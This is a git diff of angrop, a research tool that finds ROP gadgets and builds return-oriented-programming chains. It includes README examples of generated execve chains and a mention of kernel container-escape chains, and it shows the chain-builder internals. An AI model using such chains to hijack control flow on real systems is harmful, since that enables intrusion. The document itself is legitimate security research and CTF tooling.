diff --git a/Dockerfile b/Dockerfile new file mode 100644 index 00000000..c2c37a53 --- /dev/null +++ b/Dockerfile @@ -0,0 +1,27 @@ +from python:3.13-bookworm + +run apt-get update && apt-get upgrade -y +run pip install --upgrade pip + +run apt-get install -y make binutils-riscv64-linux-gnu git + +# setup python dependencies +run pip install cffi pwntools unicorn==2.0.1.post1 protobuf==5.28.2 +run pip install setuptools==79.0.1 + +run git clone --depth 1 -b wip/riscv https://github.com/angr/archinfo /archinfo +workdir /archinfo +run pip install -e . +run pip install pyvex==9.2.139 cle==9.2.139 claripy==9.2.139 +run git clone --depth 1 -b wip/riscv https://github.com/angr/angr /angr +workdir /angr +run sed -i 's/9.2.153.dev0/9.2.139/' angr/__init__.py +run sed -i 's/9.2.153.dev0/9.2.139/' ./pyproject.toml +run pip install --no-build-isolation -e . + +# install angrop +copy . /angrop +workdir /angrop +run pip install -e . +run pip install ailment==9.2.153 +copy bin/angrop-cli /usr/bin/angrop-cli diff --git a/README.md b/README.md index 4f8135f9..053df8d0 100644 --- a/README.md +++ b/README.md @@ -6,144 +6,103 @@ angrop is a rop gadget finder and chain builder ## Overview angrop is a tool to automatically generate rop chains. -It is built on top of angr's symbolic execution engine, and uses constraint solving for generating chains and understanding the effects of gadgets. +It is built on top of angr's symbolic execution engine. +It uses symbolic execution to understand the effects of gadgets and uses constraint solving and graph search for generating chains. +Its design is architecture-agnostic so it supports multiple architectures. -angrop should support all the architectures supported by angr, although more testing needs to be done. +Typically, it generates rop chains faster than humans. +In some cases, it can generate, within a few seconds, hard rop chains that may take humans hours to build. +Some examples can be found [here](examples). 
-Typically, it can generate rop chains (especially long chains) faster than humans. +It comes with a cli and a python api. +The command line `angrop-cli` offers some basic gadget finding/chaining capability such as finding a `system`/`execve` chain or invoking a specific function. +The `angrop` python api offers the full feature set. +Details can be found in [Usage](README.md#usage). -It includes functions to generate chains which are commonly used in exploitation and CTF's, such as setting registers, and calling functions. +`angrop` does not only work for userspace binaries; it works for the Linux kernel as well. ## Architectures Supported architectures: * x86/x64 -* ARM * MIPS -* AARCH64 +* ARM +* AArch64 +* RISC-V (64bit) It should be relatively easy to support other architectures that are supported by `angr`. If you'd like to use `angrop` on other architectures, please create an issue and we will look into it :) ## Usage -The ROP analysis finds rop gadgets and can automatically build rop chains. +You can use either the CLI or the Python API. +The CLI only offers some basic functionalities while the Python API provides many more capabilities and is much more powerful. + +## CLI +angrop comes with a command line tool for easy day-to-day usage +```bash +# dump command will find gadgets in the target binary, true/false marks whether the gadget is self-contained +$ angrop-cli dump /bin/ls +0x11735: true : adc bl, byte ptr [rbx + 0x4c]; mov eax, esp; pop r12; pop r13; pop r14; pop rbp; ret +0x10eaa: true : adc eax, 0x12469; add rsp, 0x38; pop rbx; pop r12; pop r13; pop r14; pop r15; pop rbp; ret +00xe026: true : adc eax, 0xcec8; pop rbx; cmove rax, rdx; pop r12; pop rbp; ret +00xdfd4: true : adc eax, 0xcf18; pop rbx; cmove rax, rdx; pop r12; pop rbp; ret +00xdfa5: true : adc eax, 0xcf4d; pop rbx; cmove rax, rdx; pop r12; pop rbp; ret +...... 
+ +# chain command will find some predefined chains in the binary +$ angrop-cli chain -t execve /bin/bash +code_base = 0x0 +chain = b"" +chain += p64(code_base + 0x36083) # pop rax; pop rbx; pop rbp; ret +chain += p64(code_base + 0x30016) # add rsp, 8; ret +chain += p64(code_base + 0x34873) +chain += p64(code_base + 0x0) +chain += p64(code_base + 0x9616d) # mov edx, ebp; mov rsi, r12; mov rdi, rbx; call rax +chain += p64(code_base + 0xe501e) # pop rsi; ret 0 +chain += p64(code_base + 0x0) +chain += p64(code_base + 0x31470) # execve@plt +chain += p64(0x0) +chain += p64(code_base + 0x10d5bf) +``` +## Python API ```python >>> import angr, angrop >>> p = angr.Project("/bin/ls") >>> rop = p.analyses.ROP() >>> rop.find_gadgets() ->>> chain = rop.set_regs(rax=0x1337, rbx=0x56565656) ->>> chain.payload_str() -b'\xb32@\x00\x00\x00\x00\x007\x13\x00\x00\x00\x00\x00\x00\xa1\x18@\x00\x00\x00\x00\x00VVVV\x00\x00\x00\x00' +>>> chain = rop.set_regs(rax=0x41414141, rbx=0x42424242) >>> chain.print_payload_code() +code_base = 0x0 chain = b"" -chain += p64(0x410b23) # pop rax; ret -chain += p64(0x1337) -chain += p64(0x404dc0) # pop rbx; ret -chain += p64(0x56565656) +chain += p64(code_base + 0xf5e2) # pop rbx; pop r12; test eax, eax; pop rbp; cmovs eax, edx; ret +chain += p64(0x42424242) +chain += p64(0x0) +chain += p64(0x0) +chain += p64(code_base + 0x812f) # pop rsi; pop rbp; ret +chain += p64(0x41414141) +chain += p64(0x0) +chain += p64(code_base + 0x169dd) # mov rax, rsi; ret +chain += p64(code_base + 0x10a55) ``` +More detailed docs on the Python API can be found [here](docs/pythonapi.md). 
-## Chains -```python -# angrop includes methods to create certain common chains - -# setting registers -chain = rop.set_regs(rax=0x1337, rbx=0x56565656) - -# moving registers -chain = rop.move_regs(rax='rdx') - -# writing to memory -# writes "/bin/sh\0" to address 0x61b100 -chain = rop.write_to_mem(0x61b100, b"/bin/sh\0") +## Demo -# calling functions -chain = rop.func_call("read", [0, 0x804f000, 0x100]) - -# adding values to memory -chain = rop.add_to_mem(0x804f124, 0x41414141) - -# shifting stack pointer like add rsp, 0x8; ret (this gadget shifts rsp by 0x10) -chain = rop.shift(0x10) - -# generating ret-sled chains like ret*0x10, but works for ARM/MIPS as well -chain = rop.retsled(0x40) - -# bad bytes can be specified to generate chains with no bad bytes -rop.set_badbytes([0x0, 0x0a]) -chain = rop.set_regs(eax=0) - -# chains can be added together to chain operations -chain = rop.write_to_mem(0x61b100, b"/home/ctf/flag\x00") + rop.func_call("open", [0x61b100,os.O_RDONLY]) + ... - -# chains can be printed for copy pasting into exploits ->>> chain.print_payload_code() -chain = b"" -chain += p64(0x410b23) # pop rax; ret -chain += p64(0x74632f656d6f682f) -chain += p64(0x404dc0) # pop rbx; ret -chain += p64(0x61b0f8) -chain += p64(0x40ab63) # mov qword ptr [rbx + 8], rax; add rsp, 0x10; pop rbx; ret -... 
- -``` - -## Gadgets - -Gadgets contain a lot of information: - -For example look at how the following code translates into a gadget - -```asm - 0x403be4: and ebp,edi - 0x403be6: mov QWORD PTR [rbx+0x90],rax - 0x403bed: xor eax,eax - 0x403bef: add rsp,0x10 - 0x403bf3: pop rbx - 0x403bf4: ret -``` - -```python ->>> print(rop.rop_gadgets[0]) -Gadget 0x403be4 -Stack change: 0x20 -Changed registers: set(['rbx', 'rax', 'rbp']) -Popped registers: set(['rbx']) -Register dependencies: - rbp: [rdi, rbp] -Memory write: - address (64 bits) depends on: ['rbx'] - data (64 bits) depends on: ['rax'] -``` - - -The dependencies describe what registers affect the final value of another register. -In the example above, the final value of rbp depends on both rdi and rbp. -Dependencies are analyzed for registers and for memory actions. -All of the information is stored as properties in the gadgets, so it is easy to iterate over them and find gadgets which fit your needs. - -```python ->>> for g in rop.rop_gadgets: - if "rax" in g.popped_regs and "rbx" not in g.changed_regs: - print(g) -Gadget 0x4032b3 -Stack change: 0x10 -Changed registers: set(['rax']) -Popped registers: set(['rax']) -Register dependencies: -``` +### gadget finding +![gadget](gifs/find_gadget.gif?raw=true) -## TODO's -Allow strings to be passed as arguments to func_call(), which are then written to memory and referenced. +### find execve chain +![execve](gifs/execve.gif?raw=true) -Add a function for open, read, write (for ctf's) +### container escape chain for the kernel +![kernel](gifs/kernel.gif?raw=true) -The segment analysis for finding executable addresses seems to break on non-elf binaries often, such as PE files, kernel modules. +## Paper +We describe our design and findings in this paper -Allow setting constraints on the generated chain e.g. bytes that are valid. 
+[__ropbot: Reimaging Code Reuse Attack Synthesis__](https://kylebot.net/papers/ropbot.pdf) -## Common gotchas -Make sure to import angrop before calling proj.analyses.ROP() +Kyle Zeng, Moritz Schloegel, Christopher Salls, Adam Doupé, Ruoyu Wang, Yan Shoshitaishvili, Tiffany Bao -Make sure to call find_gadets() before trying to make chains +*In Proceedings of the Network and Distributed System Security Symposium (NDSS), February 2026*, diff --git a/angrop/arch.py b/angrop/arch.py index be5d022c..1ae117a9 100644 --- a/angrop/arch.py +++ b/angrop/arch.py @@ -6,9 +6,10 @@ class ROPArch: def __init__(self, project, kernel_mode=False): self.project = project self.kernel_mode = kernel_mode - self.max_sym_mem_access = 4 + self.max_sym_mem_access = 1 self.alignment = project.arch.instruction_alignment - self.reg_set = self._get_reg_set() + self.reg_list = self._get_reg_list() + self.reg_set = set(self.reg_list) # backward compatibility, will be removed self.max_block_size = None self.fast_mode_max_block_size = None @@ -19,20 +20,24 @@ def __init__(self, project, kernel_mode=False): self.ret_insts = None self.execve_num = None - def _get_reg_set(self): + def _get_reg_list(self): """ - get the set of names of general-purpose registers + get the set of names of general-purpose registers + bp + because bp is usually considered as general-purpose these days """ arch = self.project.arch - _sp_reg = arch.register_names[arch.sp_offset] - _ip_reg = arch.register_names[arch.ip_offset] + sp_reg = arch.register_names[arch.sp_offset] + ip_reg = arch.register_names[arch.ip_offset] + bp_reg = arch.register_names[arch.bp_offset] # get list of general-purpose registers default_regs = arch.default_symbolic_registers # prune the register list of the instruction pointer and the stack pointer - return {r for r in default_regs if r not in (_sp_reg, _ip_reg)} + reg_list = [r for r in default_regs if r not in (sp_reg, ip_reg, bp_reg)] + reg_list.append(bp_reg) + return reg_list - def 
block_make_sense(self, block): + def block_make_sense(self, block) -> bool: return True class X86(ROPArch): @@ -47,13 +52,25 @@ def __init__(self, project, kernel_mode=False): def _x86_block_make_sense(self, block): capstr = str(block.capstone).lower() + + for inst in block.capstone.insns: + if inst.mnemonic == 'ret' and inst.op_str: + n = int(inst.op_str, 16) + if n % self.project.arch.bytes != 0 or n >= 0x100: + return False + + if inst.mnemonic == 'int' and inst.op_str: + n = int(inst.op_str, 16) + if n != 0x80: + return False + # currently, angrop does not handle "repz ret" correctly, we filter it - if any(x in capstr for x in ('cli', 'rex', 'repz ret')): + if any(x in capstr for x in ('cli', 'rex', 'repz ret', 'retf', 'hlt', 'wait', 'loop', 'lock')): return False if not self.kernel_mode: if "fs:" in capstr or "gs:" in capstr or "iret" in capstr: return False - if block.size < 1 or block.bytes[0] == 0x4f: + if block.size < 1: return False return True @@ -115,6 +132,13 @@ def __init__(self, project, kernel_mode=False): self.fast_mode_max_block_size = self.alignment * 6 self.execve_num = 0xdd + def block_make_sense(self, block): + for x in block.capstone.insns: + # won't be able to ROP with PAC + if x.mnemonic == 'autiasp': + return False + return True + class MIPS(ROPArch): def __init__(self, project, kernel_mode=False): super().__init__(project, kernel_mode=kernel_mode) @@ -122,6 +146,15 @@ def __init__(self, project, kernel_mode=False): self.max_block_size = self.alignment * 8 self.fast_mode_max_block_size = self.alignment * 6 self.execve_num = 0xfab + self.syscall_insts = {b"\x0c\x00\x00\x00"} # syscall + +class RISCV64(ROPArch): + def __init__(self, project, kernel_mode=False): + super().__init__(project, kernel_mode=kernel_mode) + self.ret_insts = {b"\x82\x80"} + self.max_block_size = self.alignment * 10 + self.fast_mode_max_block_size = self.alignment * 6 + self.execve_num = 0xdd def get_arch(project, kernel_mode=False): name = project.arch.name @@ -134,6 
+167,8 @@ def get_arch(project, kernel_mode=False): return ARM(project, kernel_mode=mode) elif name == 'AARCH64': return AARCH64(project, kernel_mode=mode) + elif name == 'RISCV64': + return RISCV64(project, kernel_mode=mode) elif name.startswith('MIPS'): return MIPS(project, kernel_mode=mode) else: diff --git a/angrop/chain_builder/__init__.py b/angrop/chain_builder/__init__.py index dd1ebd17..a4b37dd8 100644 --- a/angrop/chain_builder/__init__.py +++ b/angrop/chain_builder/__init__.py @@ -9,6 +9,7 @@ from .pivot import Pivot from .shifter import Shifter from .. import rop_utils +from ..errors import RopException l = logging.getLogger("angrop.chain_builder") @@ -48,6 +49,7 @@ def __init__(self, project, rop_gadgets, pivot_gadgets, syscall_gadgets, arch, b l.warning("%s is not a fully supported OS, SysCaller may not work on this OS", self.project.loader.main_object.os) self._shifter = Shifter(self) + self._can_do_write = None def set_regs(self, *args, **kwargs): """ @@ -160,6 +162,7 @@ def set_roparg_filler(self, roparg_filler): self.roparg_filler = roparg_filler def bootstrap(self): + # get a functional chain builder self._reg_mover.bootstrap() self._reg_setter.bootstrap() self._mem_writer.bootstrap() @@ -170,7 +173,28 @@ def bootstrap(self): self._pivot.bootstrap() self._shifter.bootstrap() - self._reg_setter.optimize() - - # should also be able to do execve by providing writable memory - # todo pass values to setregs as symbolic variables + def check_can_do_write(self): + bits = self.project.arch.bits + if bits == 32: + ptr = 0x31313131 + else: + ptr = 0x313131313131 + try: + self.write_to_mem(ptr, b'A'*4) + self._can_do_write = True + except RopException: + self._can_do_write = False + + def optimize(self, processes=1): + # optimize reg_mover and reg_setter + again = True + cnt = 0 + while again and cnt < 5: + # check whether we can do memory write in the first place. 
+ # If we can't, then there is no way to normalize jmp_mem gadgets + if not self._can_do_write: + self.check_can_do_write() + + again = self._reg_mover.optimize(processes=processes) + again |= self._reg_setter.optimize(processes=processes) + cnt += 1 diff --git a/angrop/chain_builder/builder.py b/angrop/chain_builder/builder.py index a8e55b55..2a761cbe 100644 --- a/angrop/chain_builder/builder.py +++ b/angrop/chain_builder/builder.py @@ -1,7 +1,13 @@ +import re +import math import struct +import logging +import itertools from abc import abstractmethod from functools import cmp_to_key +from collections import defaultdict +import angr import claripy from .. import rop_utils @@ -9,25 +15,26 @@ from ..rop_gadget import RopGadget from ..rop_value import RopValue from ..rop_chain import RopChain +from ..rop_block import RopBlock from ..gadget_finder.gadget_analyzer import GadgetAnalyzer +l = logging.getLogger(__name__) + class Builder: """ a generic class to bootstrap more complicated chain building functionality """ + used_writable_ptrs = [] + def __init__(self, chain_builder): self.chain_builder = chain_builder self.project = chain_builder.project self.arch = chain_builder.arch + # used for effect analysis self._gadget_analyzer = GadgetAnalyzer(self.project, True, kernel_mode=False, arch=self.arch) - self._sim_state = rop_utils.make_symbolic_state( - self.project, - self.arch.reg_set, - stack_gsize=80*3 - ) @property def badbytes(self): @@ -37,23 +44,19 @@ def badbytes(self): def roparg_filler(self): return self.chain_builder.roparg_filler - def make_sim_state(self, pc): + def make_sim_state(self, pc, stack_gsize): """ make a symbolic state with all general purpose register + base pointer symbolized and emulate a `pop pc` situation """ - arch_bytes = self.project.arch.bytes - arch_endness = self.project.arch.memory_endness - - state = rop_utils.make_symbolic_state(self.project, self.arch.reg_set) - rop_utils.make_reg_symbolic(state, self.arch.base_pointer) - + state = 
rop_utils.make_symbolic_state(self.project, self.arch.reg_list, stack_gsize) + state.stack_pop() state.regs.ip = pc - state.add_constraints(state.memory.load(state.regs.sp, arch_bytes, endness=arch_endness) == pc) - state.regs.sp += arch_bytes - state.solver._solver.timeout = 5000 return state + def set_regs(self, *args, **kwargs): + return self.chain_builder._reg_setter.run(*args, **kwargs) + @staticmethod def _sort_chains(chains): def cmp_func(chain1, chain2): @@ -90,33 +93,85 @@ def _word_contain_badbyte(self, ptr): def _get_ptr_to_writable(self, size): """ get a pointer to writable region that can fit `size` bytes + currently, we force it to point to a NULL region it shouldn't contain bad byte """ + null = b'\x00'*size + used_writable_ptrs = list(self.__class__.used_writable_ptrs) + + plt_sec = None # get all writable segments - segs = [ s for s in self.project.loader.main_object.segments if s.is_writable ] + if self.arch.kernel_mode: + segs = [x for x in self.project.loader.main_object.sections if x.name in ('.data', '.bss')] + else: + segs = [ s for s in self.project.loader.main_object.segments if s.is_writable ] + for sec in self.project.loader.main_object.sections: + if sec.name == '.got.plt': + plt_sec = sec + break + + def addr_is_used(addr): + for a, s in used_writable_ptrs: + if a <= addr < a+s or a < addr+size <= a+s: + return True + return False + # enumerate through all address to find a good address for seg in segs: - for addr in range(seg.min_addr, seg.max_addr): - if all(not self._word_contain_badbyte(x) for x in range(addr, addr+size, self.project.arch.bytes)): + # we should use project.loader.memory.find API, but it is currently broken as reported here: + # https://github.com/angr/angr/issues/5330 + max_addr = math.ceil(seg.max_addr / 0x1000)*0x1000 # // round up to page size + contains_plt = False + # my lazy implementation of avoiding taking addresses from the GOT table + # because they may not be zero during runtime even though they appear to 
be so in the binary + if plt_sec: + contains_plt = seg.min_addr <= plt_sec.min_addr and seg.max_addr >= plt_sec.max_addr + for addr in range(seg.min_addr, max_addr): + if plt_sec and contains_plt and plt_sec.contains_addr(addr): + continue + if any(self._word_contain_badbyte(x) for x in range(addr, addr+size, self.project.arch.bytes)): + continue + + data_len = size + if addr >= seg.max_addr and not addr_is_used(addr): + self.__class__.used_writable_ptrs.append((addr, size)) + return addr + if addr+size > seg.max_addr: + data_len = addr+size - seg.max_addr + try: + data = self.project.loader.memory.load(addr, data_len) + except KeyError: + continue + if data == null[:data_len] and not addr_is_used(addr): + self.__class__.used_writable_ptrs.append((addr, size)) return addr - return None + + l.error("used up all possible writable ptrs") + raise RopException("used up all possible writable ptrs") def _get_ptr_to_null(self): # get all non-writable segments segs = [ s for s in self.project.loader.main_object.segments if not s.is_writable ] # enumerate through all address to find a good address + null = b'\x00'*self.project.arch.bytes for seg in segs: - null = b'\x00'*self.project.arch.bytes for addr in self.project.loader.memory.find(null, search_min=seg.min_addr, search_max=seg.max_addr): if not self._word_contain_badbyte(addr): return addr - return None + + l.error("used up all possible ptrs to null") + raise RopException("used up all possible ptrs to null") @staticmethod def _ast_contains_stack_data(ast): vs = ast.variables return len(vs) == 1 and list(vs)[0].startswith('symbolic_stack_') + @staticmethod + def _ast_contains_reg_data(ast): + vs = ast.variables + return len(vs) == 1 and list(vs)[0].startswith('sreg_') + def _build_ast_constraints(self, ast): var_map = {} @@ -150,20 +205,76 @@ def _build_ast_constraints(self, ast): rop_values = {x:RopValue(y[1], self.project) for x,y in var_map.items()} return rop_values, consts - def _rebalance_ast(self, lhs, rhs): + 
def _solve_ast_constraint(self, ast, value): + variables = set() + if ast.op == 'BVS': + variables.add(ast) + else: + for x in ast.children_asts(): + if x.op != 'BVS': + continue + variables.add(x) + solver = claripy.Solver() + solver.add(ast == value) + + variables = list(variables) + + res = solver.batch_eval(variables, 1) + assert res + res = res[0] + + reg_d = {} + stack_d = {} + for idx, v in enumerate(variables): + name = v.args[0] + if name.startswith("sreg_"): + reg = name.split('_')[1][:-1] + reg_d[reg] = res[idx] + elif name.startswith("symbolic_stack_"): + re_res = re.match(r"symbolic_stack_(\d+)_", name) + offset = int(re_res.group(1)) # type:ignore + val = res[idx] + if self.project.arch.memory_endness == "Iend_LE": + val = claripy.Reverse(claripy.BVV(val, self.project.arch.bits)) + val = val.concrete_value + stack_d[offset] = val + else: + raise NotImplementedError("plz raise an issue") + return reg_d, stack_d + + def _rebalance_ast(self, lhs, rhs, mode='stack'): """ we know that lhs (stack content with modification) == rhs (user ropvalue) since user ropvalue may be symbolic, we need to present the stack content using the user ropvalue and store it on stack so that users can eval on their own ropvalue and get the correct solves - TODO: currently, we only support add/sub + TODO: currently, we only support add/sub, Extract/ZeroExt """ - assert self._ast_contains_stack_data(lhs) + # in some cases, we can just solve it + if mode == 'stack' and lhs.symbolic and not rhs.symbolic and len(lhs.variables) == 1 and lhs.depth > 1: + target_ast = None + for ast in lhs.children_asts(): + if ast.op == 'BVS' and ast.args[0].startswith('symbolic_stack'): + target_ast = ast + break + assert target_ast is not None + + solver = claripy.Solver() + solver.add(lhs == rhs) + return target_ast, claripy.BVV(solver.eval(target_ast, 1)[0], target_ast.size()) + + if lhs.op == 'If': + raise RopException("cannot handle conditional value atm") + + check_func = 
Builder._ast_contains_stack_data if mode == 'stack' else Builder._ast_contains_reg_data + + if not check_func(lhs): + raise RopException(f"cannot rebalance the constraint {lhs} == {rhs}") while lhs.depth != 1: match lhs.op: case "__add__" | "__sub__": arg0 = lhs.args[0] arg1 = lhs.args[1] - flag = self._ast_contains_stack_data(arg0) + flag = check_func(arg0) op = lhs.op if flag: lhs = arg0 @@ -177,18 +288,78 @@ def _rebalance_ast(self, lhs, rhs): rhs += other else: rhs = other - rhs + case "__and__" | "__or__": + arg0 = lhs.args[0] + arg1 = lhs.args[1] + flag0 = check_func(arg0) + flag1 = check_func(arg1) + if flag0 and flag1: + raise RopException(f"cannot rebalance {lhs}") + op = lhs.op + if flag0: + lhs = arg0 + other = arg1 + else: + lhs = arg1 + other = arg0 + if op == "__and__": + rhs = rhs & other case "Reverse": lhs = lhs.args[0] rhs = claripy.Reverse(rhs) + case "ZeroExt": + rhs_leading: claripy.ast.bv.BV = claripy.Extract(rhs.length-1, # type: ignore + rhs.length-lhs.args[0], + rhs) + if not rhs_leading.symbolic and rhs_leading.concrete_value != 0: + raise RopException("rebalance unsat") + rhs = claripy.Extract(rhs.length-lhs.args[0]-1, 0, rhs) + lhs = lhs.args[1] + case "SignExt": + rhs_leading: claripy.ast.bv.BV = claripy.Extract(rhs.length-1, # type: ignore + rhs.length-lhs.args[0], + rhs) + if not rhs_leading.symbolic and \ + rhs_leading.concrete_value not in (0, (1<> bits + lhs = lhs.args[0] + case "__xor__": + if check_func(lhs.args[0]): + other = lhs.args[1] + lhs = lhs.args[0] + else: + other = lhs.args[0] + lhs = lhs.args[1] + rhs = rhs ^ other case _: raise ValueError(f"{lhs.op} cannot be rebalanced at the moment. 
plz create an issue!") - assert self._ast_contains_stack_data(lhs) + assert check_func(lhs) + assert lhs.length == rhs.length return lhs, rhs - @rop_utils.timeout(8) + @rop_utils.timeout(3) def _build_reg_setting_chain( - self, gadgets, modifiable_memory_range, register_dict, stack_change - ): + self, gadgets, register_dict, constrained_addrs=None): """ This function figures out the actual values needed in the chain for a particular set of gadgets and register values @@ -196,15 +367,16 @@ def _build_reg_setting_chain( then constraining the final registers to the values that were requested """ + total_sc = sum(max(g.stack_change, g.max_stack_offset + self.project.arch.bytes) for g in gadgets) + arch_bytes = self.project.arch.bytes + # emulate a 'pop pc' of the first gadget test_symbolic_state = rop_utils.make_symbolic_state( self.project, - self.arch.reg_set, - stack_gsize=stack_change // self.project.arch.bytes + 1, + self.arch.reg_list, + total_sc//arch_bytes+1, # compensate for the first gadget ) - rop_utils.make_reg_symbolic(test_symbolic_state, self.arch.base_pointer) test_symbolic_state.ip = test_symbolic_state.stack_pop() - test_symbolic_state.solver._solver.timeout = 5000 # Maps each stack variable to the RopValue or RopGadget that should be placed there. stack_var_to_value = {} @@ -213,18 +385,37 @@ def map_stack_var(ast, value): if len(ast.variables) != 1: raise RopException("Target value not controlled by a single variable") var = next(iter(ast.variables)) - if not var.startswith("symbolic_stack_"): + if not var.startswith("symbolic_stack_") and not var.startswith("next_pc_"): raise RopException("Target value not controlled by the stack") stack_var_to_value[var] = value - arch_bytes = self.project.arch.bytes - state = test_symbolic_state.copy() # Step through each gadget and constrain the ip. 
+ stack_patchs = [] for gadget in gadgets: - map_stack_var(state.ip, gadget) - state.solver.add(state.ip == gadget.addr) + if isinstance(gadget, RopGadget): + map_stack_var(state.ip, gadget) + state.ip = gadget.addr + elif isinstance(gadget, RopBlock): + rb = gadget + map_stack_var(state.ip, rb) + state.ip = rb._values[0].concreted + st = rb._blank_state + for idx, val in enumerate(rb._values[1:]): + state.memory.store(state.regs.sp+idx*arch_bytes, val.data, endness=self.project.arch.memory_endness) + stack_patchs.append((state.regs.sp+idx*arch_bytes, val.data)) + state.solver.add(*st.solver.constraints) + # when we import constraints, it is possible some of the constraints are associated with initial + # register value now stitch them together, only the ones being used though + st_vars = st.solver._solver.variables + used_regs = {x.split('-')[0].split('_')[-1] for x in st_vars if x.startswith('sreg_')} + for reg in used_regs: + state.solver.add(state.registers.load(reg) == st.registers.load(reg)) + else: + raise ValueError("huh?") + + # step following the trace for addr in gadget.bbl_addrs[1:]: succ = state.step() succ_states = [ @@ -244,7 +435,7 @@ def map_stack_var(ast, value): ) state = succ.unconstrained_successors[0] - if len(state.solver.eval_upto(state.ip, 2)) < 2: + if len(state.solver.eval_to_ast(state.ip, 2)) < 2: raise RopException("The final pc is not unconstrained!") # Record the variable that controls the final ip. @@ -280,21 +471,37 @@ def map_stack_var(ast, value): # Constrain memory access addresses. 
for action in state.history.actions: if action.type == action.MEM and action.addr.symbolic: - if modifiable_memory_range is None: - raise RopException( - "Symbolic memory address without modifiable memory range" - ) - state.solver.add(action.addr.ast >= modifiable_memory_range[0]) - state.solver.add(action.addr.ast < modifiable_memory_range[1]) + if len(state.solver.eval_to_ast(action.addr, 2)) == 1: + continue + addr_vars = action.addr.ast.variables + if len(addr_vars) == 1 and set(addr_vars).pop().startswith("symbolic_stack"): + if constrained_addrs is not None: + ptr_bv = constrained_addrs[0] + constrained_addrs = constrained_addrs[1:] + else: + ptr_bv = claripy.BVV(self._get_ptr_to_writable(action.size.ast//8), action.addr.ast.size()) + ropvalue = rop_utils.cast_rop_value(ptr_bv, self.project) + lhs, rhs = self._rebalance_ast(action.addr.ast, ptr_bv) + if self.project.arch.memory_endness == 'Iend_LE': + rhs = claripy.Reverse(rhs) + if ropvalue.rebase: + ropvalue._value = rhs - ropvalue._code_base + else: + ropvalue._value = rhs + map_stack_var(lhs, ropvalue) # now import the constraints from the state that has reached the end of the ropchain test_symbolic_state.solver.add(*state.solver.constraints) + # now import the stack patchs + for addr, data in stack_patchs: + test_symbolic_state.memory.store(addr, data, endness=self.project.arch.memory_endness) + bytes_per_pop = arch_bytes # constrain the "filler" values if self.roparg_filler is not None: - for offset in range(0, stack_change, bytes_per_pop): + for offset in range(0, total_sc, bytes_per_pop): sym_word = test_symbolic_state.stack_read(offset, bytes_per_pop) # check if we can constrain val to be the roparg_filler if test_symbolic_state.solver.satisfiable([sym_word == self.roparg_filler]): @@ -308,9 +515,16 @@ def map_stack_var(ast, value): badbytes=self.badbytes) # iterate through the stack values that need to be in the chain - for offset in range(-bytes_per_pop, stack_change, bytes_per_pop): + if not 
chain._blank_state.satisfiable(): + raise RopException("the chain is not feasible!") + + for offset in range(-bytes_per_pop, total_sc, bytes_per_pop): sym_word = test_symbolic_state.stack_read(offset, bytes_per_pop) - assert len(sym_word.variables) == 1 + assert len(sym_word.variables) <= 1 + if not sym_word.variables: + chain.add_value(sym_word) + continue + sym_var = next(iter(sym_word.variables)) if sym_var in stack_var_to_value: val = stack_var_to_value[sym_var] @@ -320,12 +534,23 @@ def map_stack_var(ast, value): value = RopValue(val.addr, self.project) value.rebase_analysis(chain=chain) chain.add_value(value) + elif isinstance(val, RopBlock): + chain.add_value(val._values[0]) else: chain.add_value(val) else: chain.add_value(sym_word) - chain.set_gadgets(gadgets) + # expand mixins to plain gadgets + plain_gadgets = [] + for g in gadgets: + if isinstance(g, RopGadget): + plain_gadgets.append(g) + elif isinstance(g, RopBlock): + plain_gadgets += g._gadgets + else: + raise RuntimeError("???") + chain.set_gadgets(plain_gadgets) return chain @@ -336,50 +561,76 @@ def _get_fill_val(self): return claripy.BVS("filler", self.project.arch.bits) @abstractmethod - def _same_effect(self, g1, g2): - raise NotImplementedError("_same_effect is not implemented!") + def _effect_tuple(self, g): + raise NotImplementedError("_effect_tuple is not implemented!") @abstractmethod - def _better_than(self, g1, g2): - raise NotImplementedError("_better_than is not implemented!") - - def same_effect(self, g1, g2): - return self._same_effect(g1, g2) - - def better_than(self, g1, g2): - if not self.same_effect(g1, g2): - return False - return self._better_than(g1, g2) + def _comparison_tuple(self, g): + raise NotImplementedError("_comparison_tuple is not implemented!") def __filter_gadgets(self, gadgets): """ - remove any gadgets that are strictly worse than others - FIXME: make all gadget filtering logic like what we do in reg_setter, which is correct and way more faster + group gadgets by 
features and drop lesser groups """ - gadgets = set(gadgets) + # gadget grouping + d = defaultdict(list) + for g in gadgets: + key = self._comparison_tuple(g) + d[key].append(g) + if len(d) == 0: + return set() + if len(d) == 1: + return {gadgets.pop()} + + # only keep the best groups + keys = set(d.keys()) bests = set() - while gadgets: - g1 = gadgets.pop() - # check if nothing is better than g1 - for g2 in bests|gadgets: - if self._better_than(g2, g1): #pylint: disable=arguments-out-of-order + while keys: + k1 = keys.pop() + # check if nothing is better than k1 + for k2 in bests|keys: + # if k2 is better than k1 + if all(k2[i] <= k1[i] for i in range(len(key))): # type:ignore break else: - bests.add(g1) - return bests + bests.add(k1) + + # turn groups back to gadgets + gadgets = set() + for key, val in d.items(): + if key not in bests: + continue + gadgets = gadgets.union(val) + return gadgets def _filter_gadgets(self, gadgets): + """ + process gadgets based on their effects + exclude gadgets that do symbolic memory access + """ bests = set() - gadgets = set(gadgets) - while gadgets: - g0 = gadgets.pop() - equal_class = {g for g in gadgets if self._same_effect(g0, g)} - equal_class.add(g0) + equal_classes = defaultdict(set) + for g in gadgets: + equal_classes[self._effect_tuple(g)].add(g) + for _, equal_class in equal_classes.items(): bests = bests.union(self.__filter_gadgets(equal_class)) - - gadgets -= equal_class return bests + @staticmethod + def _mixins_to_gadgets(mixins): + """ + simply expand all ropblocks to gadgets + """ + gadgets = [] + for mixin in mixins: + if isinstance(mixin, RopGadget): + gadgets.append(mixin) + elif isinstance(mixin, RopBlock): + gadgets += mixin._gadgets + else: + raise ValueError(f"cannot turn {mixin} into RopBlock!") + return gadgets + @abstractmethod def bootstrap(self): """ @@ -388,9 +639,306 @@ def bootstrap(self): raise NotImplementedError("each Builder class should have an `update` method!") @abstractmethod - def 
